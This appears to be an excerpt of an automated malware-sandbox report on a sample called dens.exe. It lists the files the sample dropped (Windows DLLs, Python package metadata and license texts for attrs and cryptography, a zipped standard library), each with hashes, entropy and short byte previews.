                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....TR.........." .........@...............................................P......D!....`A............................................4............@...............@..`&..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):26232
                                                                                                                                                                                                                                            Entropy (8bit):5.289041983400337
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:UuV2OlkuWYFxEpahfWqhWNWJWadJCsVWQ4mWeX9UfKUSIX01k9z3AEXzGd5S:dV2oFVhfWqhWMCstE2IR9z5Sd5S
                                                                                                                                                                                                                                            MD5:96498DC4C2C879055A7AFF2A1CC2451E
                                                                                                                                                                                                                                            SHA1:FECBC0F854B1ADF49EF07BEACAD3CEC9358B4FB2
                                                                                                                                                                                                                                            SHA-256:273817A137EE049CBD8E51DC0BB1C7987DF7E3BF4968940EE35376F87EF2EF8D
                                                                                                                                                                                                                                            SHA-512:4E0B2EF0EFE81A8289A447EB48898992692FEEE4739CEB9D87F5598E449E0059B4E6F4EB19794B9DCDCE78C05C8871264797C14E4754FD73280F37EC3EA3C304
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...k. U.........." .........@...............................................P............`A............................................a............@...............@..x&..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):26232
                                                                                                                                                                                                                                            Entropy (8bit):5.284932479906984
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:tCLx0C5yguNvZ5VQgx3SbwA7yMVIkFGlTWqhWbQCsMSR9zful:tCV5yguNvZ5VQgx3SbwA71IkFGqHe9zI
                                                                                                                                                                                                                                            MD5:115E8275EB570B02E72C0C8A156970B3
                                                                                                                                                                                                                                            SHA1:C305868A014D8D7BBEF9ABBB1C49A70E8511D5A6
                                                                                                                                                                                                                                            SHA-256:415025DCE5A086DBFFC4CF322E8EAD55CB45F6D946801F6F5193DF044DB2F004
                                                                                                                                                                                                                                            SHA-512:B97EF7C5203A0105386E4949445350D8FF1C83BDEAEE71CCF8DC22F7F6D4F113CB0A9BE136717895C36EE8455778549F629BF8D8364109185C0BF28F3CB2B2CA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.... .h.........." .........@...............................................P......\.....`A.........................................................@...............@..x&..............p............................................................................rdata.._........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22120
                                                                                                                                                                                                                                            Entropy (8bit):5.253102285412285
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:mt3hwDGWqhWrWEXCVWQ4mWn+deyttuX01k9z3A23x:AWqhWgPSR9zfh
                                                                                                                                                                                                                                            MD5:001E60F6BBF255A60A5EA542E6339706
                                                                                                                                                                                                                                            SHA1:F9172EC37921432D5031758D0C644FE78CDB25FA
                                                                                                                                                                                                                                            SHA-256:82FBA9BC21F77309A649EDC8E6FC1900F37E3FFCB45CD61E65E23840C505B945
                                                                                                                                                                                                                                            SHA-512:B1A6DC5A34968FBDC8147D8403ADF8B800A06771CC9F15613F5CE874C29259A156BAB875AAE4CAAEC2117817CE79682A268AA6E037546AECA664CD4EEA60ADBF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...G............" .........0...............................................@.......&....`A.........................................................0...............0..h&..............p............................................................................rdata..=...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22136
                                                                                                                                                                                                                                            Entropy (8bit):4.810971823417463
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:p/fHQduDWqhWJWJWadJCsVWQ4mWxrnyttuX01k9z3A2Yv6WT:p/ftWqhWoCsmySR9zfYvvT
                                                                                                                                                                                                                                            MD5:A0776B3A28F7246B4A24FF1B2867BDBF
                                                                                                                                                                                                                                            SHA1:383C9A6AFDA7C1E855E25055AAD00E92F9D6AAFF
                                                                                                                                                                                                                                            SHA-256:2E554D9BF872A64D2CD0F0EB9D5A06DEA78548BC0C7A6F76E0A0C8C069F3C0A9
                                                                                                                                                                                                                                            SHA-512:7C9F0F8E53B363EF5B2E56EEC95E7B78EC50E9308F34974A287784A1C69C9106F49EA2D9CA037F0A7B3C57620FCBB1C7C372F207C68167DF85797AFFC3D7F3BA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...2............." .........0...............................................@......^.....`A............................................^............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (411)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11524
                                                                                                                                                                                                                                            Entropy (8bit):5.211520136058075
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:ERsUfi6bkQk+k/kKkegToJWicnJsPVA1oz2dv7COmoKTACoEJdQ/0G6lWg+JdQV5:ERsXpLs3VoJWRnJsPvz2dDCHoKsLgA6z
                                                                                                                                                                                                                                            MD5:49CABCB5F8DA14C72C8C3D00ADB3C115
                                                                                                                                                                                                                                            SHA1:F575BECF993ECDF9C6E43190C1CB74D3556CF912
                                                                                                                                                                                                                                            SHA-256:DC9824E25AFD635480A8073038B3CDFE6A56D3073A54E1A6FB21EDD4BB0F207C
                                                                                                                                                                                                                                            SHA-512:923DAEEE0861611D230DF263577B3C382AE26400CA5F1830EE309BD6737EED2AD934010D61CDD4796618BEDB3436CD772D9429A5BED0A106EF7DE60E114E505C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.3.Name: attrs.Version: 24.2.0.Summary: Classes Without Boilerplate.Project-URL: Documentation, https://www.attrs.org/.Project-URL: Changelog, https://www.attrs.org/en/stable/changelog.html.Project-URL: GitHub, https://github.com/python-attrs/attrs.Project-URL: Funding, https://github.com/sponsors/hynek.Project-URL: Tidelift, https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=pypi.Author-email: Hynek Schlawack <hs@ox.cx>.License-Expression: MIT.License-File: LICENSE.Keywords: attribute,boilerplate,class.Classifier: Development Status :: 5 - Production/Stable.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classifier: Programming Languag
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3556
                                                                                                                                                                                                                                            Entropy (8bit):5.809424313364516
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:Q9ewBtnJT/oPynEddwBbCobXm9qGmR5VXzskcGD+qLtxO:2ewnXJCKXGeR/XzKiO
                                                                                                                                                                                                                                            MD5:4B6973D2285295CF5E3A45E64EB7A455
                                                                                                                                                                                                                                            SHA1:1089F2F3C35303D6D5DD19F0C0F707B9609EE3F2
                                                                                                                                                                                                                                            SHA-256:2B368DFC37283970C33CC8D4EEC129F668EB99EBF9D3AA27F49A1B149658F2B0
                                                                                                                                                                                                                                            SHA-512:A5150ECB625A3CFDC3F22C60EB7B16FDBED01CD47505BD520491B477AE24E8C59FFAE2334948122E656F6F0A5F2AF0635B6D976241745583A3D7AF9E3781718D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:attr/__init__.py,sha256=l8Ewh5KZE7CCY0i1iDfSCnFiUTIkBVoqsXjX9EZnIVA,2087..attr/__init__.pyi,sha256=aTVHBPX6krCGvbQvOl_UKqEzmi2HFsaIVm2WKmAiqVs,11434..attr/__pycache__/__init__.cpython-312.pyc,,..attr/__pycache__/_cmp.cpython-312.pyc,,..attr/__pycache__/_compat.cpython-312.pyc,,..attr/__pycache__/_config.cpython-312.pyc,,..attr/__pycache__/_funcs.cpython-312.pyc,,..attr/__pycache__/_make.cpython-312.pyc,,..attr/__pycache__/_next_gen.cpython-312.pyc,,..attr/__pycache__/_version_info.cpython-312.pyc,,..attr/__pycache__/converters.cpython-312.pyc,,..attr/__pycache__/exceptions.cpython-312.pyc,,..attr/__pycache__/filters.cpython-312.pyc,,..attr/__pycache__/setters.cpython-312.pyc,,..attr/__pycache__/validators.cpython-312.pyc,,..attr/_cmp.py,sha256=3umHiBtgsEYtvNP_8XrQwTCdFoZIX4DEur76N-2a3X8,4123..attr/_cmp.pyi,sha256=U-_RU_UZOyPUEQzXE6RMYQQcjkZRY25wTH99sN0s7MM,368..attr/_compat.py,sha256=n2Uk3c-ywv0PkFfGlvqR7SzDXp4NOhWmNV_ZK6YfWoM,2958..attr/_config.py,sha256=z81Vt-GeT_2taxs1XZfmHx9TWlSxjP
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):87
                                                                                                                                                                                                                                            Entropy (8bit):4.730668933656452
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeXAaCTQnP+tPCCfA5I:Rt2PcnWBB3
                                                                                                                                                                                                                                            MD5:52ADFA0C417902EE8F0C3D1CA2372AC3
                                                                                                                                                                                                                                            SHA1:B67635615EEF7E869D74F4813B5DC576104825DD
                                                                                                                                                                                                                                            SHA-256:D7215D7625CC9AF60AED0613AAD44DB57EBA589D0CCFC3D8122114A0E514C516
                                                                                                                                                                                                                                            SHA-512:BFA87E7B0E76E544C2108EF40B9FAC8C5FF4327AB8EDE9FEB2891BD5D38FEA117BD9EEBAF62F6C357B4DEADDAD5A5220E0B4A54078C8C2DE34CB1DD5E00F2D62
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: hatchling 1.25.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1109
                                                                                                                                                                                                                                            Entropy (8bit):5.104415762129373
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:bGf8rUrmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:bW8rUaJHlxE3dQHOs5exm3ogFh
                                                                                                                                                                                                                                            MD5:5E55731824CF9205CFABEAB9A0600887
                                                                                                                                                                                                                                            SHA1:243E9DD038D3D68C67D42C0C4BA80622C2A56246
                                                                                                                                                                                                                                            SHA-256:882115C95DFC2AF1EEB6714F8EC6D5CBCABF667CAFF8729F42420DA63F714E9F
                                                                                                                                                                                                                                            SHA-512:21B242BF6DCBAFA16336D77A40E69685D7E64A43CC30E13E484C72A93CD4496A7276E18137DC601B6A8C3C193CB775DB89853ECC6D6EB2956DEEE36826D5EBFE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:The MIT License (MIT)..Copyright (c) 2015 Hynek Schlawack and the attrs contributors..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHE
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1332808
                                                                                                                                                                                                                                            Entropy (8bit):5.5869946203131615
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:rclJGUq/0LGn9vc+fYNXPh26UZWAzbX7jF/yquSxGh5dmlPHH8VdAt/RO2/HK2:rclJGUh69zb/FX7O5dmlPn2Ag2/HK2
                                                                                                                                                                                                                                            MD5:00CB04E37BCF1B05ED9D8FD286F395AC
                                                                                                                                                                                                                                            SHA1:B4A112962EDA09B9F975AC47F123184B745C29A3
                                                                                                                                                                                                                                            SHA-256:632FE06274F3C7AEEAC7F8C451A4D2C9751BE5F641019522BA09C6F311075EC8
                                                                                                                                                                                                                                            SHA-512:E365D66808604BA740467E46AF4BB2FDE15D24094ABD4B0C939DF185D500D148CC6E77E703FC5BB85B7574155341AAA02914963FDDE9D1001C4218575E9D1994
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:PK..........!.LX. S...S......._collections_abc.pyc......................................Z.....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.............Z...e.d.........Z.d...Z...e.e.........Z.[.g.d...Z.d.Z...e...e.d.................Z...e...e...e.........................Z...e...e.i.j%..........................................Z...e...e.i.j)..........................................Z...e...e.i.j-..........................................Z...e...e.g.................Z...e...e...e.g.........................Z...e...e...e.d.........................Z...e...e...e.d.d.z...........................Z...e...e...e.........................Z...e...e.d.................Z ..e...e.d.................Z!..e...e...e"........................Z#..e.i.j%..................................Z$..e.i.j)..................................Z%..e.i.j-..................................Z&..e.e.jN..........................Z(..e...d...................Z)d...Z*..e*........Z*..e.e*........Z+e*jY............................[*d...Z-..e-........
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5440
                                                                                                                                                                                                                                            Entropy (8bit):5.074342830021076
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:DlaQIUQIhQIKQILbQIRIaMPktjaVxsxA2TtLDmplH7dwnqTIvrUmA0JQTQCQx5KN:LcPuP1srTtLDmplH7JTIvYX0JQTQ9x54
                                                                                                                                                                                                                                            MD5:554DC6138FDBF98B7F1EDFE207AF3D67
                                                                                                                                                                                                                                            SHA1:B6C806E2AFF9A0F560916A90F793348DBF0514BA
                                                                                                                                                                                                                                            SHA-256:0064A9B5FD2AC18605E512EF7127318AD9CF259E9445488C169F237A590602E1
                                                                                                                                                                                                                                            SHA-512:3A71B533874F4D0F94F15192791D2FA4DF9E8EBF184C711F1D4FA97230C04764C1C9A93258355B08107E5B72053C6901E883E3DB577E8A204D5B9EB3F8BC7BFC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.3.Name: cryptography.Version: 43.0.1.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: License :: OSI Approved :: BSD License.Classifier: Natural Language :: English.Classifier: Operating System :: MacOS :: MacOS X.Classifier: Operating System :: POSIX.Classifier: Operating System :: POSIX :: BSD.Classifier: Operating System :: POSIX :: Linux.Classifier: Operating System :: Microsoft :: Windows.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classif
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):15579
                                                                                                                                                                                                                                            Entropy (8bit):5.567434003079107
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:bX1ToLbz5jF4E9VqhXJZ4WPB6s7B0Ppz+NX6in5Lqw/I+B:bXeLbhCEsJrPB6s7B0Ppz+96innVB
                                                                                                                                                                                                                                            MD5:E8478B758300439BF58613F2A3A2676C
                                                                                                                                                                                                                                            SHA1:39ED064E67212A54E4B8D1C909E6AD2ACF48025D
                                                                                                                                                                                                                                            SHA-256:5ADEAA62D3045659DDF79324823AA3BCB1CA78F264442D6F6F6B9C8A8470A634
                                                                                                                                                                                                                                            SHA-512:D7029823DC5585FBE885DDB52EED2D02D1584EB945EF23916391201FCBD17DF0B14F338BDFC6E81318297F831CA99796423206F781373857317E068F0C0B321C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:cryptography-43.0.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..cryptography-43.0.1.dist-info/METADATA,sha256=AGSptf0qwYYF5RLvcScxitnPJZ6URUiMFp8jelkGAuE,5440..cryptography-43.0.1.dist-info/RECORD,,..cryptography-43.0.1.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..cryptography-43.0.1.dist-info/WHEEL,sha256=8_4EnrLvbhzH224YH8WypoB7HFn-vpbwr_zHlr3XUBI,94..cryptography-43.0.1.dist-info/license_files/LICENSE,sha256=Pgx8CRqUi4JTO6mP18u0BDLW8amsv4X1ki0vmak65rs,197..cryptography-43.0.1.dist-info/license_files/LICENSE.APACHE,sha256=qsc7MUj20dcRHbyjIJn2jSbGRMaBOuHk8F9leaomY_4,11360..cryptography-43.0.1.dist-info/license_files/LICENSE.BSD,sha256=YCxMdILeZHndLpeTzaJ15eY9dz2s0eymiSMqtwCPtPs,1532..cryptography/__about__.py,sha256=pY_pmYXjJTK-LjfCu7ot0NMj0QC2dkD1dCPyV8QjISM,445..cryptography/__init__.py,sha256=mthuUrTd4FROCpUYrTIqhjz6s6T9djAZrV7nZ1oMm2o,364..cryptography/__pycache__/__about__.cpython-312.pyc,,..cryptography/__pycache__/__ini
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):94
                                                                                                                                                                                                                                            Entropy (8bit):5.016084900984752
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX5pGogP+tkKciH/KQb:RtvoTWKTQb
                                                                                                                                                                                                                                            MD5:C869D30012A100ADEB75860F3810C8C9
                                                                                                                                                                                                                                            SHA1:42FD5CFA75566E8A9525E087A2018E8666ED22CB
                                                                                                                                                                                                                                            SHA-256:F3FE049EB2EF6E1CC7DB6E181FC5B2A6807B1C59FEBE96F0AFFCC796BDD75012
                                                                                                                                                                                                                                            SHA-512:B29FEAF6587601BBE0EDAD3DF9A87BFC82BB2C13E91103699BABD7E039F05558C0AC1EF7D904BCFAF85D791B96BC26FA9E39988DD83A1CE8ECCA85029C5109F0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: maturin (1.7.0).Root-Is-Purelib: false.Tag: cp39-abi3-win_amd64.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):197
                                                                                                                                                                                                                                            Entropy (8bit):4.61968998873571
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreLRuOFEXAYeBKmJozlMHuO:h9Co8FyQjkDYc5tWreLBF/pn2mH1
                                                                                                                                                                                                                                            MD5:8C3617DB4FB6FAE01F1D253AB91511E4
                                                                                                                                                                                                                                            SHA1:E442040C26CD76D1B946822CAF29011A51F75D6D
                                                                                                                                                                                                                                            SHA-256:3E0C7C091A948B82533BA98FD7CBB40432D6F1A9ACBF85F5922D2F99A93AE6BB
                                                                                                                                                                                                                                            SHA-512:77A1919E380730BCCE5B55D76FBFFBA2F95874254FAD955BD2FE1DE7FC0E4E25B5FDAAB0FEFFD6F230FA5DC895F593CF8BFEDF8FDC113EFBD8E22FADAB0B8998
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:This software is made available under the terms of *either* of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made.under the terms of *both* these licenses..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11360
                                                                                                                                                                                                                                            Entropy (8bit):4.426756947907149
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:nUDG5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEnQHbHR:UIvlKM1zJlFvmNz5VrlkTS0QHt
                                                                                                                                                                                                                                            MD5:4E168CCE331E5C827D4C2B68A6200E1B
                                                                                                                                                                                                                                            SHA1:DE33EAD2BEE64352544CE0AA9E410C0C44FDF7D9
                                                                                                                                                                                                                                            SHA-256:AAC73B3148F6D1D7111DBCA32099F68D26C644C6813AE1E4F05F6579AA2663FE
                                                                                                                                                                                                                                            SHA-512:F451048E81A49FBFA11B49DE16FF46C52A8E3042D1BCC3A50AAF7712B097BED9AE9AED9149C21476C2A1E12F1583D4810A6D36569E993FE1AD3879942E5B0D52
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial ow
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1532
                                                                                                                                                                                                                                            Entropy (8bit):5.058591167088024
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:MjUnoorbOFFTJJyRrYFTjzMbmqEvBTP4m96432s4EOkUTKQROJ32s3yxsITf+3tY:MkOFJSrYJsaN5P406432svv32s3EsIqm
                                                                                                                                                                                                                                            MD5:5AE30BA4123BC4F2FA49AA0B0DCE887B
                                                                                                                                                                                                                                            SHA1:EA5B412C09F3B29BA1D81A61B878C5C16FFE69D8
                                                                                                                                                                                                                                            SHA-256:602C4C7482DE6479DD2E9793CDA275E5E63D773DACD1ECA689232AB7008FB4FB
                                                                                                                                                                                                                                            SHA-512:DDBB20C80ADBC8F4118C10D3E116A5CD6536F72077C5916D87258E155BE561B89EB45C6341A1E856EC308B49A4CB4DBA1408EABD6A781FBE18D6C71C32B72C41
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Copyright (c) Individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... 3. Neither the name of PyCA Cryptography nor the names of its contributors. may be used to endorse or promote products derived from this software. without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7900672
                                                                                                                                                                                                                                            Entropy (8bit):6.519460416205842
                                                                                                                                                                                                                                            Encrypted:false
